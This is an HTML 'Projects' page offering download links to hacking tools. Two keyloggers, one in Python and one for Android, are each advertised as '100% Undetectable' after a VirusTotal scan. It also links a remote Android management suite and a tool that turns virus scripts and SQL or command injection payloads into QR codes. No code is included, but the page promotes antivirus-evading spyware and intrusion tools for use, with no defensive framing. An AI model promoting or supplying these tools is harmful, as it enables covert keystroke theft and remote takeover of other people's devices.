<!DOCTYPE html>
<html>
<head>
  <title>Project</title>
  <link rel="icon" type="image/x-icon" href="logo.png">
</head>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
    <script src="https://code.jquery.com/jquery-3.4.1.slim.min.js" integrity="sha384-J6qa4849blE2+poT4WnyKhv5vZF5SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ+n" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>
<link href='https://fonts.googleapis.com/css?family=Poppins' rel='stylesheet'>
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
 <style>
        body {
            animation: fadeInAnimation ease 3s;
            animation-iteration-count: 1;
            animation-fill-mode: forwards;
            background-color: black;
        }
        @keyframes fadeInAnimation {
            0% {
                opacity: 0;
            }
            100% {
                opacity: 1;
            }
        }
        body {
  padding: 40px 0;
  background-color: black;
}

.grid {
  display: grid;
  grid-template-columns: repeat(auto-fill, minmax(280px, 1fr));
  grid-gap: 25px;
  align-items: stretch;
  background-color: black;
}

.grid > article {
  border-radius: 4%;
  border: 0px solid #ccc;
  background-color: #1a1a1a;
  box-shadow: 2px 2px 6px 0px rgba(0, 0, 0, 0.3);
}

.grid > article img {
    width:  100%;
    height: 200px;
    object-fit: cover;
  border-radius: 4% 4% 0% 0%;
}

.grid .text {
  padding: 20px;
}
.head{
  color: white;
  font-family: Poppins;
}
.zoom {
  transition: transform .2s;
}

.zoom:hover {
  -ms-transform: scale(1.5); /* IE 9 */
  -webkit-transform: scale(1.5); /* Safari 3-8 */
  transform: scale(1.1); 
}

    </style>
<body>
  <div class="container">
    <div class="w3-container w3-animate-right">
      <h1 class="head">Projects</h1>
    </div>
      <br>
  <main class="grid">
    <article class="zoom">
      <img src="images/keylogger.jpg" alt="Sample photo">
      <div class="text">
        <h3 style="color: white;">Keylogger Python Software</h3>
        <p style="color: white;">Simple Python Kwylogger Software.100% Undetectable. Scanned By Virus Total</p>
                <div class="zoom">
        <center><a href="https://github.com/D4Vinci/PyLoggy.git" class="btn btn-outline-danger" class="zoom" style="width: 100%">Download Now</a></center>
      </div>
      </div>
    </article>
    <article class="zoom">
      <img src="https://signal.avg.com/hubfs/Blog_Content/Avg/Signal/AVG%20Signal%20Images/Keyloggers%20What%20They%20Are/What_is_a_Keylogger-Thumb.jpg" alt="Sample photo">
      <div class="text">
        <h3 style="color: white;">Keylogger Android Application</h3>
        <p style="color: white;">Best Android Keylogger For By Hackisthan.100% Undetectable. Scanned By Virus Total</p>
                <div class="zoom">
        <center><a href="https://www.mediafire.com/folder/5f1feng7rk9hn/Keyloggers" class="btn btn-outline-danger" class="zoom" style="width: 100%">Download Now</a></center>
      </div>
      </div>
    </article>
        <article class="zoom">
      <img src="https://repository-images.githubusercontent.com/207894535/cf3fc480-3d8c-11ea-831e-e9dbba8efbcb" alt="Sample photo">
      <div class="text">
        <h3 style="color: white;">L3MON - A Cloud based remote android managment suite</h3>
        <p style="color: white;">A Cloud Based Remote Android Managment Suite For Linux And Termux</p>
                <div class="zoom">
        <center><a href="https://github.com/D3VL/L3MON.git" class="btn btn-outline-danger" class="zoom" style="width: 100%">Download Now</a></center>
      </div>
      </div>
    </article>
            <article class="zoom">
      <img src="https://www.ceotodaymagazine.com/CEO-Today/wp-content/uploads/2019/06/The-Worst-Computer-Viruses-in-History.jpg" alt="Sample photo">
      <div class="text">
        <h3 style="color: white;">Virus QR Code Maker</h3>
        <p style="color: white;">Convert a Virus Script ,SQL Injection, Command Injection Into An Qr Code</p>
                <div class="zoom">
        <center><a href="https://github.com/h0nus/QRGen" class="btn btn-outline-danger" class="zoom" style="width: 100%">Download Now</a></center>
      </div>
      </div>
    </article>
  </main>
</div>
</body>
</html>
